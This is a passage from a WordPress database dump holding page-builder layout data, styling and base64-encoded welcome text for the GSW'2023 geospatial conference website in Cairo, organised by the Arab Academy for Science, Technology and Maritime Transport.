2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6147,2386,'_elementor_page_assets','a:0:{}'),
(6148,2386,'_elementor_css','a:6:{s:4:\"time\";i:1665147434;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6403,2391,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6404,2391,'_wp_page_template','default'),
(6405,2391,'_elementor_edit_mode','builder'),
(6406,2391,'_elementor_template_type','wp-page'),
(6407,2391,'_elementor_version','3.7.8'),
(6408,2391,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6409,2391,'_elementor_page_assets','a:0:{}'),
(6410,2392,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6411,2392,'_wp_page_template','default'),
(6412,2392,'_elementor_edit_mode','builder'),
(6413,2392,'_elementor_template_type','wp-page'),
(6414,2392,'_elementor_version','3.7.8'),
(6415,2392,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJ